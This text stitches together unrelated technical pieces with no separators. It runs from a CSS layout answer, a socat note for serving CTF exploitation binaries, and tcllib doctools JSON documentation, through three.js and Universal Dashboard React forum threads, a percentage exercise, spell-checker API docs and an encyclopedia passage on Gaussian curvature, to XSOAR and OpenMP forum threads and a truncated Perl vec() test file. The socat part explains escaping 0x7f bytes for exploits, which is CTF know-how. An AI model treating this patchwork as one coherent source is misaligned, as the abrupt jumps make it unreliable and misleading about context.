2. Place both elements in another (container) element (so they are laid out one after the other in normal flow)
3. Absolutely position the container element

That said, you should be able to get the effect you are after by setting border-bottom on the header and removing the divider entirely.
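A minimal sketch of that last suggestion, built only from the rules already shown in the question (so treat it as illustrative rather than a drop-in fix):

#header {
  position: absolute;
  top: 0;
  left: 0;
  height: 88px;
  width: 100%;
  border-bottom: 1px solid black; /* plays the role of the divider */
}

For the second divider above the footer, option 2 from the answer applies instead: keep the footer and a plain, non-positioned .horizontal-divider together in normal flow, or give the footer its own border-top.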
Socat

More on socat

socat is a "multipurpose relay" often used to serve binary exploitation challenges in CTFs. Essentially, it transfers stdin and stdout to the socket and also allows simple forking capabilities. The following is an example of how you could host a binary on port 5000:

socat tcp-l:5000,reuseaddr,fork EXEC:"./vuln",pty,stderr

Most of the command is fairly logical (and the rest you can look up). What is important, however, is pty mode. Because pty mode allows you to communicate with the process as if you were a user, it takes in input literally - including DELETE characters. If you send a \x7f - a DELETE - it will literally delete the previous character (as shown shortly in my Dream Diary: Chapter 1 writeup).

This is incredibly relevant because in 64-bit the \x7f byte is almost always present in glibc addresses, so it's not really possible to avoid (although you could keep rerunning the exploit until the rare occasion you get an 0x7e... libc base).

To bypass this we use the socat pty escape character \x16 and prepend it to any \x7f we send across.
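In an exploit script this boils down to escaping the payload before it is sent. A minimal sketch (the function name and the bytes-in/bytes-out framing are mine, not from the original notes):

def escape_pty(data: bytes) -> bytes:
    # Prefix every DELETE byte (0x7f) with socat's pty escape byte (0x16)
    # so the 0x7f reaches the target instead of erasing the previous byte.
    return data.replace(b"\x7f", b"\x16\x7f")

Any \x7f inside, say, a leaked or forged glibc address then survives the pty untouched.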
doctools::toc::import::json(3tcl)        Documentation tools        doctools::toc::import::json(3tcl)

NAME

doctools::toc::import::json - JSON import plugin

SYNOPSIS

package require Tcl 8.4
package require doctools::toc::import::json ?0.1?
package require doctools::toc::structure
package require json

import string configuration

DESCRIPTION

This package implements the doctools table of contents import plugin for the parsing of JSON markup.

This is an internal package of doctools, for use by the higher level management packages handling tables of contents, especially doctools::toc::import, the import manager. Using it from a regular interpreter is possible, however only with contortions, and is not recommended. The proper way to use this functionality is through the package doctools::toc::import and the import manager objects it provides.

API

The API provided by this package satisfies the specification of the doctoc import plugin API version 2.

import string configuration

    This command takes the string and parses it as JSON markup encoding a table of contents, in the context of the specified configuration (a dictionary). The result of the command is the canonical serialization of that table of contents, in the form specified in section ToC serialization format.

JSON NOTATION OF TABLES OF CONTENTS

The JSON format used for tables of contents is a direct translation of the ToC serialization format, mapping Tcl dictionaries as JSON objects and Tcl lists as JSON arrays. For example, the Tcl serialization

doctools::toc {
    items {
        {reference {
            desc {DocTools - Tables of Contents}
            id introduction.man
            label doctools::toc::introduction
        }}
        {division {
            id processing.man
            items {
                {reference {
                    desc {doctoc serialization utilities}
                    id structure.man
                    label doctools::toc::structure
                }}
                {reference {
                    desc {Parsing text in doctoc format}
                    id parse.man
                    label doctools::toc::parse
                }}
            }
            label Processing
        }}
    }
    label {Table of Contents}
    title TOC
}

is equivalent to the JSON string

{
    "doctools::toc" : {
        "items" : [{
            "reference" : {
                "desc" : "DocTools - Tables of Contents",
                "id" : "introduction.man",
                "label" : "doctools::toc::introduction"
            }
        },{
            "division" : {
                "id" : "processing.man",
                "items" : [{
                    "reference" : {
                        "desc" : "doctoc serialization utilities",
                        "id" : "structure.man",
                        "label" : "doctools::toc::structure"
                    }
                },{
                    "reference" : {
                        "desc" : "Parsing text in doctoc format",
                        "id" : "parse.man",
                        "label" : "doctools::toc::parse"
                    }
                }],
                "label" : "Processing"
            }
        }],
        "label" : "Table of Contents",
        "title" : "TOC"
    }
}

TOC SERIALIZATION FORMAT

Here we specify the format used by the doctools v2 packages to serialize tables of contents as immutable values for transport, comparison, etc.

We distinguish between regular and canonical serializations. While a table of contents may have more than one regular serialization, only exactly one of them will be canonical.

regular serialization

[1] The serialization of any table of contents is a nested Tcl dictionary.
[2] This dictionary holds a single key, doctools::toc, and its value. This value holds the contents of the table of contents.
[3] The contents of the table of contents are a Tcl dictionary holding the title of the table of contents, a label, and its elements. The relevant keys and their values are

    title
        The value is a string containing the title of the table of contents.
    label
        The value is a string containing a label for the table of contents.
    items
        The value is a Tcl list holding the elements of the table, in the order they are to be shown.
Each element is a Tcl list holding the type of the item, and its description, in this order. An alternative description would be that it is a Tcl dictionary holding a single key, the item type, mapped to the item description. The two legal item types and their descriptions are

    reference
        This item describes a single entry in the table of contents, referencing a single document. To this end its value is a Tcl dictionary containing an id for the referenced document, a label, and a longer textual description which can be associated with the entry. The relevant keys and their values are

        id
            The value is a string containing the id of the document associated with the entry.
        label
            The value is a string containing a label for this entry. This string also identifies the entry, and no two entries (references and divisions) in the containing list are allowed to have the same label.
        desc
            The value is a string containing a longer description for this entry.

    division
        This item describes a group of entries in the table of contents, inducing a hierarchy of entries. To this end its value is a Tcl dictionary containing a label for the group, an optional id to a document for the whole group, and the list of entries in the group. The relevant keys and their values are

        id
            The value is a string containing the id of the document associated with the whole group. This key is optional.
        label
            The value is a string containing a label for the group. This string also identifies the entry, and no two entries (references and divisions) in the containing list are allowed to have the same label.
        items
            The value is a Tcl list holding the elements of the group, in the order they are to be shown. This list has the same structure as the value for the keyword items used to describe the whole table of contents, see above.

This closes the recursive definition of the structure, with divisions holding the same type of elements as the whole table of contents, including other divisions.

canonical serialization

The canonical serialization of a table of contents has the format as specified in the previous item, and then additionally satisfies the constraints below, which make it unique among all the possible serializations of this table of contents.

[1] The keys found in all the nested Tcl dictionaries are sorted in ascending dictionary order, as generated by Tcl's builtin command lsort -increasing -dict.

BUGS, IDEAS, FEEDBACK

This document, and the package it describes, will undoubtedly contain bugs and other problems. Please report such in the category doctools of the Tcllib Trackers [http://core.tcl.tk/tcllib/reportlist]. Please also report any ideas for enhancements you may have for either package and/or documentation.

When proposing code changes, please provide unified diffs, i.e. the output of diff -u. Note further that attachments are strongly preferred over inlined patches. Attachments can be made by going to the Edit form of the ticket immediately after its creation, and then using the left-most button in the secondary navigation bar.

KEYWORDS

JSON, deserialization, doctools, import, table of contents, toc

CATEGORY

Text formatter plugin

COPYRIGHT

Copyright (c) 2009 Andreas Kupries <[email protected]>

0.1        tcllib
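The page never shows the plugin being driven directly, and the DESCRIPTION section advises against it; still, as a hedged sketch of the documented command signature (import string configuration), direct use would look roughly like this, with the file name and the empty configuration dictionary being assumptions of mine:

package require doctools::toc::import::json

set chan [open toc.json r]
set json [read $chan]
close $chan

# configuration is a dictionary; empty is the simplest case
set serial [import $json {}]

The result in serial is the canonical ToC serialization specified above. In practice you would go through doctools::toc::import and its import manager objects instead.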
How do I customize mouse actions in OrbitControls (or use another control) to do something like this example?

I want to do something like this example. I need to customize the mouse actions, as in the example above:
• drag up or drag down to zoom the map in and out
• drag left or drag right to rotate the map

I used OrbitControls, but it only allows using the left mouse button to pan and the right mouse button to rotate. I can't use the left mouse button for both the zoom action and the rotate action like the above example. I read the docs, but they only allow customizing which mouse buttons are used:

controls.mouseButtons = {
  LEFT: THREE.MOUSE.ROTATE,
  MIDDLE: THREE.MOUSE.DOLLY,
  RIGHT: THREE.MOUSE.PAN
}

I want to customize the mouse actions in three.js like the above example. Everyone who has experience, please help me. Thank you very much.
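For reference, the remapping that the mouseButtons setting permits looks like this; the reordering below is purely illustrative (it only swaps which button triggers which built-in action, which is exactly the limitation described above):

controls.mouseButtons = {
  LEFT: THREE.MOUSE.PAN,     // left drag now pans
  MIDDLE: THREE.MOUSE.DOLLY, // middle drag still zooms
  RIGHT: THREE.MOUSE.ROTATE  // right drag now rotates
};

Mapping a single button to different actions depending on the drag direction is not something this setting covers.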
Get-UDElement on custom component? So @adam kindly pointed me to how to achieve allowing get-udelement on a custom component…except I cannot figure out or debug why this doesn’t work:- import React from 'react'; import BeautyStars from 'beauty-stars'; class <%=$PLASTER_PARAM_ControlName%> extends React.Component { // state is for keeping control state before or after changes. state = { //value: 0 } constructor(props) { super(props); this.state = { value: 0 } } onIncomingEvent(eventName, event) { if (event.type === "requestState") { UniversalDashboard.post(`/api/internal/component/element/sessionState/${event.requestId}`, { attributes: { value: this.state.value } }); } } onChanged(t) { this.setState({ value: t.target.value }); if (this.props.onChange == null) { return } var val = t.target.value; UniversalDashboard.publish('element-event', { type: "clientEvent", eventId: this.props.onChange, eventName: 'onChange', eventData: val.toString() }); } render() { return ( <BeautyStars value={this.state.value} onChange={value => this.setState({ value })} /> ); } } export default <%=$PLASTER_PARAM_ControlName%> can you post new code example without all the plaster template things… and i see your problem Like this buddy? https://paste.ofcode.org/X5Azq2VeKDDvAccumJLBgE import { useEffect, useState, useCallback } from "react"; const SET_STATE = "setState"; const REQUEST_STATE = "requestState"; const REMOVE_ELEMENT = "removeElement"; const ADD_ELEMENT = "addElement"; const CLEAR_ELEMENT = "clearElement"; const SYNC_ELEMENT = "syncElement"; export default function useDashboardEvent(elementId, initialState) { const { content, ...attributes } = initialState; const [state, setState] = useState({ content: content, attributes: attributes }); useEffect(() => { // console.log('UniversalDashboard Object: ', UniversalDashboard) // console.log("ud event hook: ", state); const pubSubToken = UniversalDashboard.subscribe(elementId, events); return () => UniversalDashboard.unsubscribe(pubSubToken); }, [elementId, initialState]); const events = useCallback( (msg, event) => { switch (event.type) { // Set-UDElement case SET_STATE: setState(state => { return { attributes: { ...state.attributes, ...event.state.attributes }, content: event.state.content ? (Array.isArray(event.state.content) ? 
event.state.content : Array.from(event.state.content)) : [] } }); break; // Get-UDElement case REQUEST_STATE: UniversalDashboard.post( `/api/internal/component/element/sessionState/${event.requestId}`, { ...state } ); break; // Add-UDElement case ADD_ELEMENT: setState(state => { return { ...state, content: state.content.concat(event.elements) }; }); break; // Remove-UDElement case REMOVE_ELEMENT: setState(state => { let newStateContent = state.content; newStateContent.splice(-1, 1); return { ...state, content: [...newStateContent] }; }); break; // Clear-UDElement case CLEAR_ELEMENT: setState(state => { return { ...state, content: [] }; }); break; // Sync-UDElement case SYNC_ELEMENT: reload(); break; // Just break default: break; } }, [event] ); const reload = useCallback(() => { UniversalDashboard.get( `/api/internal/component/element/${elementId}`, data => setState(state => { return { ...state, content: data }; }) ); }, [elementId]); return [state, reload, setState]; } This is a custom react hook that i’ve created , it take care of all ud events so copy this content to new file now the second step in your component add this line import useDashboardEvent from "../Hooks/useDashboardEvent"; step 3 inside your component add thus lines const [state, reload] = useDashboardEvent(props.id, props); const { content, attributes } = state; example code for onChange const onChange = event => { UniversalDashboard.publish("element-event", { type: "clientEvent", eventId: attributes.id + "onChange", eventName: "onChange", eventData: event }); }; example of the switch component return <Switch {...attributes} {...customIcons} checked={checked} onChange={onChange} /> ); Example of the full UDAntd Switch component import React, { useState } from "react"; import { Switch } from "antd"; import useDashboardEvent from "../Hooks/useDashboardEvent"; const AntdSwitch = props => { const [state, reload] = useDashboardEvent(props.id, props); const { content, attributes } = state; const [checked, setChecked] = useState(attributes.checked) const onChange = event => { setChecked(!checked) UniversalDashboard.publish("element-event", { type: "clientEvent", eventId: attributes.id + "onChange", eventName: "onChange", eventData: event }); }; const customIcons = { checkedChildren: UniversalDashboard.renderComponent(attributes.checkedChildren), unCheckedChildren: UniversalDashboard.renderComponent(attributes.unCheckedChildren) } return ( <Switch {...attributes} {...customIcons} checked={checked} onChange={onChange} /> ); }; export default AntdSwitch; the powershell command file look like this function New-UDAntdSwitch { param( [Parameter()] [string]$Id = (New-Guid).ToString(), [Parameter()] [string]$ClassName, [Parameter()] [switch]$autoFocus, [Parameter()] [switch]$checked, [Parameter()] [object]$checkedChildren, [Parameter()] [switch]$defaultChecked, [Parameter()] [switch]$disabled, [Parameter()] [switch]$loading, [Parameter()] [ValidateSet("default","small","large")] [string]$size, [Parameter()] [object]$unCheckedChildren, [Parameter()] [object]$onChange, [Parameter()] [hashtable]$Style ) End { if ($null -ne $OnClick) { if ($OnClick -is [scriptblock]) { $OnClick = New-UDEndpoint -Endpoint $OnClick -Id ($Id + "onClick") } elseif ($OnClick -isnot [UniversalDashboard.Models.Endpoint]) { throw "OnClick must be a script block or UDEndpoint" } } if ($null -ne $onChange) { if ($onChange -is [scriptblock]) { $onChange = New-UDEndpoint -Endpoint $onChange -Id ($Id + "onChange") } elseif ($onChange -isnot 
[UniversalDashboard.Models.Endpoint]) { throw "OnClick must be a script block or UDEndpoint" } } @{ assetId = $AssetId isPlugin = $true type = "ud-antd-switch" id = $Id className = $ClassName autoFocus = $AutoFocus.IsPresent checked = $Checked.IsPresent checkedChildren = $CheckedChildren defaultChecked = $DefaultChecked.IsPresent disabled = $Disabled.IsPresent loading = $Loading.IsPresent size = $Size unCheckedChildren = $UnCheckedChildren # onChange = $OnChange # onClick = $OnClick style = $Style } } } 2 Likes Thanks @AlonGvili for sharing this code and explaining how to do this. It’s really, really appreciated as I only ask for help when I have tried all avenues I can think of, so to get a reply with an answer is great :smile: will make sure I review this and apply, as need to build this into all custom components essentially to get the most out of them interacting with universal dashboard? 2 Likes Ok so I copied and pasted the custom hook you created into its own file, and saved that as “useDashboardEvent.jsx” in a folder called “Hooks” in the main component folder…then done the following in the script:- import React from 'react'; import BeautyStars from 'beauty-stars'; import useDashboardEvent from "../Hooks/useDashboardEvent"; class <%=$PLASTER_PARAM_ControlName%> extends React.Component { constructor(props) { super(props); this.state = { value: 0 } } render() { const [state, reload] = useDashboardEvent(props.id, props); const { content, attributes } = state; const onChange = event => { value => this.setState({ value }) UniversalDashboard.publish("element-event", { type: "clientEvent", eventId: attributes.id + "onChange", eventName: "onChange", eventData: event }); }; return ( <BeautyStars value={this.state.value} onChange={onChange} /> ); } } export default <%=$PLASTER_PARAM_ControlName%> But on the output of the build I get:- Version: webpack 4.30.0 Time: 4243ms Built at: 10/16/2019 10:18:37 PM 2 assets Entrypoint index = index.0b520ba5aa6630172432.bundle.js index.0b520ba5aa6630172432.bundle.map [3] ./components/index.js + 2 modules 7.62 KiB {0} [built] | 3 modules + 3 hidden modules ERROR in ./components/udstar.jsx Module not found: Error: Can’t resolve ‘…/Hooks/useDashboardEvent’ in 'C:\ud\UDStar\udrate\src\components’ @ ./components/udstar.jsx 29:0-59 53:31-48 @ ./components/index.js npm ERR! code ELIFECYCLE npm ERR! errno 2 npm ERR! [email protected] build: webpack -p --env production npm ERR! Exit status 2 npm ERR! npm ERR! Failed at the [email protected] build script. npm ERR! This is probably not a problem with npm. There is likely additional logging output above. npm ERR! A complete log of this run can be found in: npm ERR! C:\Users\Adz\AppData\Roaming\npm-cache_logs\2019-10-16T21_18_37_309Z-debug.log Copy-Item : Cannot find path ‘C:\ud\UDStar\udrate\src\public’ because it does not exist. At C:\ud\UDStar\udrate\src\build.ps1:21 char:1 • Copy-Item $BuildFolder\public*.bundle.js $OutputPath Can you add some baby steps for me please? 
:baby: :baby_bottle: I did try quite a few other copy and paste attempts into my component.jsx file from the code you kindly provided @AlonGvili, but the code I posted is the closest to building I could get :cry:

First, you can NOT use react hooks inside a Class component, only in functions

const AntdSwitch = props => {
    const [state, reload] = useDashboardEvent(props.id, props);
    const { content, attributes } = state;
    const [checked, setChecked] = useState(attributes.checked)
    const onChange = event => {
        setChecked(!checked)
        UniversalDashboard.publish("element-event", {
            type: "clientEvent",
            eventId: attributes.id + "onChange",
            eventName: "onChange",
            eventData: event
        });
    };
    const customIcons = {
        checkedChildren: UniversalDashboard.renderComponent(attributes.checkedChildren),
        unCheckedChildren: UniversalDashboard.renderComponent(attributes.unCheckedChildren)
    }
    return (
        <Switch {...attributes} {...customIcons} checked={checked} onChange={onChange} />
    );
};

export default AntdSwitch;

as you can see in this example code I use a function, NOT a class.

Second, if your file is in the same folder as the Hooks folder, replace

import useDashboardEvent from "../Hooks/useDashboardEvent";

with

import useDashboardEvent from "./Hooks/useDashboardEvent";

Please create a github repo with all your code folders and files so I can help you.

Many thanks again @AlonGvili, I will upload this to github and let you know when it's on there. Will try and have a few more goes with the helpful information you provided.

I created a GH repo of what I think is a good starting point to build a custom control. Clone the repo and see if this helps you.

Sweet @AlonGvili. After your words of advice I changed it from a class to a function and it built without errors. Which was great, but sadly I got a minified react error. It was half midnight by then so went to bed. I will make time today to look at this further help you have provided. Thanks again man, means a lot.

Thanks again man, looking at this now…first build failed…so on to attempt 2 :smiley:

Sorry man, still struggling. I ended up opting for the original build method, as mentioned I was getting some compiling errors…but with the new-found knowledge you gave me I came up with this:-

https://github.com/psDevUK/UDscripts/blob/master/udrate.jsx

but it seems the this.onChanged.bind(this) is not quite working, as removing that allows me to use the component, but I want to record what the current value is…help please…

Ok, as not a web developer, I totally forgot to look at the debugger in the browser…Doh! It's saying e.target is not defined…so guess that's why nothing is happening…will try your method again as I'm a bit baffled by this…

I will create you a demo with your control, when I get back home

Just to show my appreciation man I made you a special custom component myself tonight:-

alon

Old skool type-writer :slight_smile:

Love it!!! sooo coool

I sent you a PR with the full source code for the UDRate module

Well I was getting all frustrated not being able to do the element support, so as you kindly said you would do me a PR, which you did do, I thought I needed to show Alon how much you have inspired me. So this was the best I could come up with before I needed to get some sleep after a tough long week in the office. I have just approved your PR whilst having my first cup of Yorkshire Tea for the day…will make sure I study and learn this, to then apply this same technique to other custom components. Thanks again @AlonGvili

OMG only 25 lines of code!
I was obviously over-complicating things…can you explain the setValue(newstar) part? The newstar bit I don't see documented anywhere as an official property object. So is this a variable you create on the fly to describe what it is doing, yeah? Wow, const [value, setValue] = useState(0), it's all starting to click in my head how this all comes together :smiley:

const [value, setValue] = useState(0)

It's a react hook. Instead of all the setState calls in a class component, you just write one line in the new react version.
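Putting the thread's advice together, the shape of the finished control is roughly the following sketch. It is assembled only from snippets already posted above (useDashboardEvent, the element-event publish call, and the BeautyStars props), so treat the names and details as illustrative rather than the exact merged PR:

import React, { useState } from "react";
import BeautyStars from "beauty-stars";
import useDashboardEvent from "./Hooks/useDashboardEvent";

const UDRate = props => {
  // The custom hook handles the Get-UDElement / Set-UDElement events
  const [state] = useDashboardEvent(props.id, props);
  const { attributes } = state;
  const [value, setValue] = useState(0);

  const onChange = newValue => {
    setValue(newValue);
    // Report the new rating back to the dashboard's onChange endpoint
    UniversalDashboard.publish("element-event", {
      type: "clientEvent",
      eventId: attributes.id + "onChange",
      eventName: "onChange",
      eventData: newValue.toString()
    });
  };

  return <BeautyStars value={value} onChange={onChange} />;
};

export default UDRate;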
A company made 2700 radios last month. If 1% of them were defective, how many defective radios were produced?

Answer: 2700/100 = 27, so 1% = 27. Therefore, 27 defective radios were produced.

Virtual Teaching Assistant: Colleen R. | Question Level: Basic | Karma: Free | Upload Date: 5/31/2017
This question was answered by Colleen R. on StudySoup on 5/31/2017. The question contains content related to Business.
Gets or sets a value of type IgnoreCaseSettings determining if and how the case of a word is ignored while spell checking. The default value is AllUpper | WordBeginUpper. Syntax public Proofing.TXSpell.IgnoreCaseSettings IgnoreCase { get; set; } Public Property IgnoreCase() As Proofing.TXSpell.IgnoreCaseSettings Remarks The IgnoreCaseSettings enumeration values Always, Never, WordBegin and WordBeginUpper must not be combined among one another, but can be combined with AllLower and/or AllUpper. For all other combinations an exception is thrown.
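A short usage sketch (the spell-checker object name is an assumption of mine; the enum values and the legal combination follow the remarks above):

// Valid: one positional setting (WordBeginUpper) combined with AllUpper.
// This combination is also the documented default value.
txSpellChecker.IgnoreCase = Proofing.TXSpell.IgnoreCaseSettings.AllUpper |
                            Proofing.TXSpell.IgnoreCaseSettings.WordBeginUpper;

// Invalid: Always, Never, WordBegin and WordBeginUpper must not be combined
// among one another; per the remarks, the line below would throw an exception.
// txSpellChecker.IgnoreCase = Proofing.TXSpell.IgnoreCaseSettings.Always |
//                             Proofing.TXSpell.IgnoreCaseSettings.Never;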
Curvature of surfaces

To measure the curvature of a surface at a point, Euler, in 1760, looked at cross sections of the surface made by planes that contain the line perpendicular (or "normal") to the surface at the point (see figure). Euler called the curvatures of these cross sections the normal curvatures of the surface at the point. For example, on a right cylinder of radius r, the vertical cross sections are straight lines and thus have zero curvature; the horizontal cross sections are circles, which have curvature 1/r. The normal curvatures at a point on a surface are generally different in different directions. The maximum and minimum normal curvatures at a point on a surface are called the principal (normal) curvatures, and the directions in which these normal curvatures occur are called the principal directions. Euler proved that for most surfaces where the normal curvatures are not constant (for example, the cylinder), these principal directions are perpendicular to each other. (Note that on a sphere all the normal curvatures are the same and thus all are principal curvatures.) These principal normal curvatures are a measure of how "curvy" the surface is.

The theory of surfaces and principal normal curvatures was extensively developed by French geometers led by Gaspard Monge (1746–1818). It was in an 1827 paper, however, that the German mathematician Carl Friedrich Gauss made the big breakthrough that allowed differential geometry to answer the question raised above of whether the annular strip is isometric to the strake. The Gaussian curvature of a surface at a point is defined as the product of the two principal normal curvatures; it is said to be positive if the principal normal curvatures curve in the same direction and negative if they curve in opposite directions. Normal curvatures for a plane surface are all zero, and thus the Gaussian curvature of a plane is zero. For a cylinder of radius r, the minimum normal curvature is zero (along the vertical straight lines), and the maximum is 1/r (along the horizontal circles). Thus, the Gaussian curvature of a cylinder is also zero.

If the cylinder is cut along one of the vertical straight lines, the resulting surface can be flattened (without stretching) onto a rectangle. In differential geometry, it is said that the plane and cylinder are locally isometric. These are special cases of two important theorems:

• Gauss's "Remarkable Theorem" (1827). If two smooth surfaces are isometric, then the two surfaces have the same Gaussian curvature at corresponding points. (Although defined extrinsically, Gaussian curvature is an intrinsic notion.)
• Minding's theorem (1839). Two smooth ("cornerless") surfaces with the same constant Gaussian curvature are locally isometric.

As corollaries to these theorems:

• A surface with constant positive Gaussian curvature c has locally the same intrinsic geometry as a sphere of radius 1/√c. (This is because a sphere of radius r has Gaussian curvature 1/r².)
• A surface with constant zero Gaussian curvature has locally the same intrinsic geometry as a plane. (Such surfaces are called developable.)
• A surface with constant negative Gaussian curvature c has locally the same intrinsic geometry as a hyperbolic plane. (See non-Euclidean geometry.)

The Gaussian curvature of an annular strip (being in the plane) is constantly zero. So to answer whether or not the annular strip is isometric to the strake, one needs only to check whether a strake has constant zero Gaussian curvature.
The Gaussian curvature of a strake is actually negative, hence the annular strip must be stretched—although this can be minimized by narrowing the shapes.

Shortest paths on a surface

From an outside, or extrinsic, perspective, no curve on a sphere is straight. Nevertheless, the great circles are intrinsically straight—an ant crawling along a great circle does not turn or curve with respect to the surface. About 1830 the Estonian mathematician Ferdinand Minding defined a curve on a surface to be a geodesic if it is intrinsically straight—that is, if there is no identifiable curvature from within the surface. A major task of differential geometry is to determine the geodesics on a surface. The great circles are the geodesics on a sphere. A great circle arc that is longer than a half circle is intrinsically straight on the sphere, but it is not the shortest distance between its endpoints. On the other hand, the shortest path in a surface is not always straight, as shown in the figure.

An important theorem is: On a surface which is complete (every geodesic can be extended indefinitely) and smooth, every shortest curve is intrinsically straight and every intrinsically straight curve is the shortest curve between nearby points.
How to monitor system performance (disk) in XSOAR 6.12

L2 Linker:
We want to monitor server performance in real time. For that we are using the default dashboard named "System Health", but it does not let us monitor disk usage. Our server is on-prem and its XSOAR version is 6.12. Please assist quickly.

L2 Linker:
Please, someone support on this.

L1 Bithead:
Hi @assubramania
Have you tried the following content pack? If not, please give it a try.
https://cortex.marketplace.pan.dev/marketplace/details/HealthCheck/
Also, you can always use any APM solution (free or paid) to monitor your on-prem environment in real time.

L1 Bithead:
To monitor system performance, including disk usage, in Cortex XSOAR 6.12, you can also set up custom monitoring using scripts and dashboards. Since the default "System Health" dashboard may not include disk monitoring, you can create your own dashboard or enhance the existing one through a custom script (automation) using the "psutil" Python library, for example. Then you can create a Job to run the script periodically, or you may create a custom Dashboard to display disk usage:

    import psutil

    def main():
        # Get disk usage statistics for the root filesystem
        disk_usage = psutil.disk_usage('/')

        # Prepare the results
        results = {
            'Total': disk_usage.total,
            'Used': disk_usage.used,
            'Free': disk_usage.free,
            'Percent': disk_usage.percent
        }

        # Return the results to the XSOAR context (demisto, entryTypes and
        # formats are globals provided by the XSOAR automation environment)
        demisto.results({
            'Type': entryTypes['note'],
            'ContentsFormat': formats['json'],
            'Contents': results,
            'EntryContext': {
                'DiskUsage': results
            }
        })

    if __name__ in ('__main__', '__builtin__', 'builtins'):
        main()
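psutil reports sizes in bytes, which can be hard to read on a dashboard. A small variation of the script above (illustrative only; the helper name is ours, not from the replies) converts the counts to gigabytes first:

    import psutil

    def human_readable_disk_usage(path='/'):
        # Convert psutil's byte counts to GB for display purposes.
        usage = psutil.disk_usage(path)
        gb = 1024 ** 3
        return {
            'TotalGB': round(usage.total / gb, 2),
            'UsedGB': round(usage.used / gb, 2),
            'FreeGB': round(usage.free / gb, 2),
            'Percent': usage.percent,
        }

    print(human_readable_disk_usage())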
Strange behavior in a parallelized loop

General OpenMP discussion

Postby yurytsoy » Thu Apr 12, 2012 10:19 pm

Hi, everybody!

There is a piece of code which behaves very strangely to me (it models a situation from elsewhere, so it doesn't have much sense on its own, but it works in an unexpected manner):

Code:

    #include <iostream>
    #include <vector>
    using namespace std;

    const int SIZE = 5000;

    class Fitness {
    public:
       float value;
       Fitness (float val) {
          value = val;
       }
    };

    Fitness* func2(float* mas) {
       float res = 0;
       for (int i=0; i<SIZE; ++i) {
          res += mas[i];
       }
       return new Fitness (res);
    }

    void func(float**);

    int main () {
       float** mas = new float*[SIZE];
       for (int i=0; i<SIZE; ++i) {
          mas[i] = new float[SIZE];
          for (int j=0; j<SIZE; ++j) {
             mas[i][j] = i;   // each row simply contains all elements equal to the row's index.
          }
       }
       func (mas);
       for (int i=0; i<SIZE; ++i)
          delete[] mas[i];
       delete[] mas;
       return 0;
    }

    void func (float** mas) {
       int size = 10;
       Fitness** fits = new Fitness*[SIZE];
    #pragma omp parallel for shared(fits, SIZE, mas)
       for (int i = 0; i < SIZE; i++) {
          fits[i] = func2(mas[i]);
    #pragma omp critical
          {
             if (i != 0) {
                cout<<i<<"\t"<<fits[i]->value<<"\t"<<fits[i]->value / i<<"\n";    // should always print SIZE in the last column
             } else {
                cout<<i<<"\t"<<fits[i]->value<<"\n";
             }
          }
       }
       for (int i=0; i<SIZE; ++i) delete fits[i];
       delete[] fits;
    }

The problem is that the line for checking the correctness of func doesn't always print SIZE, but sometimes (~15-20% of the time) something very close to it, like 4999.9 or 5000.1 (if SIZE is 5000). The problem doesn't emerge when SIZE is rather small (10, 100, 1000), but it's there for SIZE > 5000. I can't understand it at all, nor can I find any potential explanation. Could anyone please help me out with what I'm missing here?

Thanks a lot!
Yury

Re: Strange behavior in a parallelized loop

Postby MarkB » Fri Apr 13, 2012 7:25 am

This is just a loss-of-precision problem in floating point arithmetic: by the time the row sums are large enough (around 10^7), they can no longer be represented at full accuracy in a float type. If you use doubles instead of floats you should see the problem go away (at least for SIZE = 5000). This is nothing to do with OpenMP or parallelism, by the way: the problem is just the same in the sequential code.

Re: Strange behavior in a parallelized loop

Postby yurytsoy » Fri Apr 13, 2012 9:50 pm

Oops, that was really a lame mistake of mine. Thanks!
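MarkB's explanation can be checked with a minimal sequential snippet (no OpenMP involved; this is our sketch, not from the thread). A float has a 24-bit significand, so once a running sum passes 2^24 (about 1.67e7) it can no longer represent every integer exactly, and 5000 * 4999 = 24,995,000 is well past that:

    #include <iostream>

    int main() {
        float  fsum = 0.0f;
        double dsum = 0.0;
        // Mimics summing row 4999 of the matrix: 5000 copies of 4999.
        for (int i = 0; i < 5000; ++i) {
            fsum += 4999.0f;
            dsum += 4999.0;
        }
        std::cout << "float:  " << fsum / 4999.0f << '\n';  // may print e.g. 4999.9 or 5000.1
        std::cout << "double: " << dsum / 4999.0  << '\n';  // prints 5000
        return 0;
    }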
This is a live mirror of the Perl 5 development currently hosted at https://github.com/perl/perl5

[perl #128260] Fix \substr %h

t / op / vec.t

    #!./perl

    BEGIN {
        chdir 't' if -d 't';
        require './test.pl';
        set_up_inc('../lib');
    }

    plan( tests => 37 );

    is(vec($foo,0,1), 0);
    is(length($foo), undef);
    vec($foo,0,1) = 1;
    is(length($foo), 1);
    is(unpack('C',$foo), 1);
    is(vec($foo,0,1), 1);

    is(vec($foo,20,1), 0);
    vec($foo,20,1) = 1;
    is(vec($foo,20,1), 1);
    is(length($foo), 3);
    is(vec($foo,1,8), 0);
    vec($foo,1,8) = 0xf1;
    is(vec($foo,1,8), 0xf1);
    is((unpack('C',substr($foo,1,1)) & 255), 0xf1);
    is(vec($foo,2,4), 1);
    is(vec($foo,3,4), 15);
    vec($Vec, 0, 32) = 0xbaddacab;
    is($Vec, "\xba\xdd\xac\xab");
    is(vec($Vec, 0, 32), 3135089835);

    # ensure vec() handles numericalness correctly
    $foo = $bar = $baz = 0;
    vec($foo = 0,0,1) = 1;
    vec($bar = 0,1,1) = 1;
    $baz = $foo | $bar;
    ok($foo eq "1" && $foo == 1);
    ok($bar eq "2" && $bar == 2);
    ok("$foo $bar $baz" eq "1 2 3");

    # error cases

    $x = eval { vec $foo, 0, 3 };
    like($@, qr/^Illegal number of bits in vec/);
    $@ = undef;
    $x = eval { vec $foo, 0, 0 };
    like($@, qr/^Illegal number of bits in vec/);
    $@ = undef;
    $x = eval { vec $foo, 0, -13 };
    like($@, qr/^Illegal number of bits in vec/);
    $@ = undef;
    $x = eval { vec($foo, -1, 4) = 2 };
    like($@, qr/^Negative offset to vec in lvalue context/);
    $@ = undef;
    ok(! vec('abcd', 7, 8));

    # UTF8
    # N.B. currently curiously coded to circumvent bugs elswhere in UTF8 handling

    $foo = "\x{100}" . "\xff\xfe";
    $x = substr $foo, 1;
    is(vec($x, 0, 8), 255);
    $@ = undef;
    eval { vec($foo, 1, 8) };
    ok(! $@);
    $@ = undef;
    eval { vec($foo, 1, 8) = 13 };
    ok(! $@);
    if ($::IS_EBCDIC) {
        is($foo, "\x8c\x0d\xff\x8a\x69");
    }
    else {
        is($foo, "\xc4\x0d\xc3\xbf\xc3\xbe");
    }
    $foo = "\x{100}" . "\xff\xfe";
    $x = substr $foo, 1;
